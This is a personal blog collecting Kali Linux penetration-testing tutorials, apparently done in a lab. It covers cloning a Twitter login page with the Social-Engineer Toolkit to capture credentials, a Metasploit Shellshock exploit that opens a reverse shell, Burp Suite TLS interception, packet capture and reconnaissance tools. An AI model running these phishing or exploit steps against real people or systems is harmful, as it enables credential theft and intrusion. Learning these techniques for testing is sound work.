Jerdy's blog

Social Engineering Toolkit

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the https://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

By using SET, we can clone any website and get the username and the  password.

For this tutorial, let us try to get username and password from twitter.com

In Kali Linux, type: “setoolkit”

After you see the picture above, type 1

Type 2

Type 3

Type 2 then press Enter, and you will see a display like the picture below

Next we  have to input the our IP. In this case, my IP is 10.0.2.15. Then press Enter

We type the site that we want to clone

Next, we go to browser and type the IP address and we will be shown like the picture below. Then, input the username and password and click Enter.

It will be directed to the real page with SSL in it.

We have successfully get the username and password.

In this post, Using Metasploit we are to try to scan the vulnerability that exists in the vulnerable VM and to exploit that vulnerability.

Open Terminal in Kali linux and type msfconsole.

Then, type search shellshock to search for exploits.

Search for the apache_mod_cgi_bash_env_exec module, and copy the location:

Load the exploit by typing use followed by the location we just copied:

Type options to see the various settings for this module:

Next, set the remote host to the IP address of the target. In this case it is 10.0.2.5.

Set also the local host to the IP address of your kali linux.

Finally, set the target URI to the file we place in the /cgi-bin directory:

Type show payloads to view different payloads and information regarding each of them:

Reverse TCP shell will be enough. Type set payload linux/x86/shell/reverse_tcp:

Type options again to check the current settings for this module:

After we are done checking, type check, and if the module allows it, information about whether the target is vulnerable or not will be displayed:

We can see that the target is vulnerable, so use the exploit command to launch the attack.

A shell session is opened, and we can now run commands like id and whoami to view information about the current user:

Firstly, open the browser, Mozilla Firefox, and activate BurpSuite

Now, we are going to set our proxy to manual in Mozilla Firefox.

Click open menu. “open menu” looks like a 3-bar button. Then I click preferences

After clicking preferences, we will be shown something like the image below.

Now at the top right corner, there is a search bar. In the search bar, type “proxy”. Then click the Settings button.

Now, just click Manual proxy configuration then click OK.

Now, we are going to create the new open SSL

These are the files that were created after creating the open SSL: ca.der, server.key.der, and server.key.pkcs8.der

Next, we must import the SSL that we made to the burpsuite and to our browser.

Click the “Import/export certificate” button.

We also need to import the SSL certificate in our browser.

Preferences > Privacy and Security *Scroll to the very bottom* > Certificates > View Certificates

In View Certificates, choose the “Authorities” section and click Import. Choose the ca.der file.

Now after setting our own SSL in Burpsuite and Mozilla Firefox, browse any website and the SSL will be under “Verisign Corp”.

Below is the picture of a HTTPS traffic captured by Burpsuite when browsing youtube.com

In Kali Linux, I opened Terminal and typed ifconfig to know my ip address. My IP address is 192.168.1.9. My target is the first Ethernet interface eth0. eth0 has ip address 192.168.1.1 After knowing my ip address and my target’s ip address, I typed:

tcpdump -vvn -i eth0 host 192.168.1.1 -w test.pcap

While it is listening on eth0, I browse in Google Chrome. After I finished browsing, I typed ^C (Control C) and it stopped capturing packets. It captured 66 packets. The data that I captured is stored in test.pcap.

In this post, I will show some basic Linux commands.

• cd <directory> : changes to the specified directory.
• cd .. : moves the current working director backwards.
• pwd : prints the current working directory.
• ls : lists all files and directories.
• ls -a : lists all files and directories including hidden files.
• touch <file> : creates an empty file
• cat <file>: print everything inside the file
• mkdir <directory> : creates a new folder with the specified name
• mv <file> <new location>: moves a file to the specified directory
• rm <file> : removes the specified file
• rm * : removes all files in the specified directory
• rm -r <directory> : removes a directory and all the files inside it
• clear: clears the terminal
• man <command> : prints out the manual of the specified command
• nano <file> : opens a simple terminal text editor for the file

What is TheHarvester?

TheHarvester is a tool for gathering e-mail accounts, subdomain names, virtual hosts, open ports/ banners, and employee names from different public sources.

Why TheHarvester?

This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.

Source: https://github.com/laramies/theHarvester/

How to use TheHarvester?

No need to worry about the “warning” because it is just telling us that theHarvester does not work on any site that has SSL.

The function of -d is to search for any domain or name of a company.
The function of -b is to choose the data source such as bing, google, twitter, etc.

After typing “theharvester -d pentest.id -b google”, I received the results as the following:

What is JoomScan?

OWASP JoomScan (short for [Joom]la Vulnerability [Scan]ner) is an opensource project in perl programming language to detect Joomla CMS vulnerabilities and analysis them.

Why JoomScan?

If you want to do a penetration test on a Joomla CMS, OWASP JoomScan is Your best shot ever! This Project is being faster than ever and updated with the latest Joomla vulnerabilities.

Source: https://github.com/rezasp/joomscan

How to use JoomScan?

What is Maltego?

Maltego is an interactive data mining tool that renders directed graphs for link analysis. The tool is used in online investigations for finding relationships between pieces of information from various sources located on the Internet.

What does Maltego do?

The focus of Maltego is analyzing real-world relationships between information that is publically accessible on the Internet. This includes footprinting Internet infrastructure as well as gathering information about the people and organizations who own it.

How to use Maltego?

Open Kali linux, go to Applications, and choose Maltego.

The first thing is that we have to choose the maltego type we want to use. Click on the Community Edition. We will be asked to log in then. Click register here to make a new account.

Once we are logged in, choose create a new graph

Drag the Domain section to the graph and input the domain name

Choose All Transforms to search for all of the possible DNS servers and every network associated with the target. Then click the “arrow”.

Kali Linux provides many tools for information gathering.

For this post, I am going to introduce Host:

What is Host?

Host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa.

Options:

How to use Host?

Kali Linux provides many tools for information gathering.

For this post, I am going to introduce Nmap:

What is Nmap?

Nmap, short for Network Mapper, is a free, open-source tool for vulnerability scanning and network discovery. Network administrators use Nmap to identify what devices are running on their systems, discovering hosts that are available and the services they offer, finding open ports and detecting security risks.

How to use Nmap?

nmap *domainname*

Example: nmap pentest.id